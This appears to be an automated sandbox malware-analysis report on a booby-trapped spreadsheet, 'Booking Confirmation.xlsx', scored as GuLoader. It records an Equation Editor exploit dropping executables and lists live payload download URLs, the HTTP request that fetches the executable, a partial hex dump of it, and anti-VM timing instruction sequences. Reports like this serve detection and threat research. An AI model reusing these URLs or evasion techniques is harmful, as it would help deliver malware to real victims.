Windows Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name: Booking Confirmation.xlsx
Analysis ID: 448719
MD5: 870a4c72bccd58de144c7b845d56c626
SHA1: 482681f75180bbb1286e1f93ce44dfae0b6b0007
SHA256: 37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://180.214.239.39/port/.svchost.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 72MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 14 Jul 2021 14:55:35 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /port/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /port/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 3E10AF3D.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A54E7 NtAllocateVirtualMemory, 6_2_002A54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A55AC NtAllocateVirtualMemory, 6_2_002A55AC
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A54E7 6_2_002A54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7036 6_2_002A7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A100E 6_2_002A100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4071 6_2_002A4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A80D4 6_2_002A80D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2940 6_2_002A2940
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2958 6_2_002A2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A29B0 6_2_002A29B0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2183 6_2_002A2183
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A42CD 6_2_002A42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A72C3 6_2_002A72C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B2D 6_2_002A1B2D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B1A 6_2_002A1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7B73 6_2_002A7B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B5F 6_2_002A1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4B8E 6_2_002A4B8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8385 6_2_002A8385
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A43F1 6_2_002A43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A341B 6_2_002A341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A844C 6_2_002A844C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8C82 6_2_002A8C82
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A34C4 6_2_002A34C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8CD5 6_2_002A8CD5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A350F 6_2_002A350F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8D58 6_2_002A8D58
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7D52 6_2_002A7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0EFE 6_2_002A0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3F0C 6_2_002A3F0C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7F03 6_2_002A7F03
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7F6D 6_2_002A7F6D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0FB5 6_2_002A0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4785 6_2_002A4785
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2793 6_2_002A2793
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Booking Confirmation.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE916.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Booking Confirmation.xlsx Static file information: File size 1221992 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: Booking Confirmation.xlsx Initial sample: OLE indicators vbamacros = False
Source: Booking Confirmation.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040495E push es; ret 6_2_00404963
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221774 push edx; ret 6_2_002217A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Booking Confirmation.xlsx Stream path 'EncryptedPackage' entropy: 7.99865188998 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7036 6_2_002A7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A100E 6_2_002A100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4071 6_2_002A4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2958 6_2_002A2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A42CD 6_2_002A42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B1A 6_2_002A1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B5F 6_2_002A1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A43F1 6_2_002A43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A341B 6_2_002A341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7D52 6_2_002A7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0EFE 6_2_002A0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0FB5 6_2_002A0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6F9E 6_2_002A6F9E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2793 6_2_002A2793
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
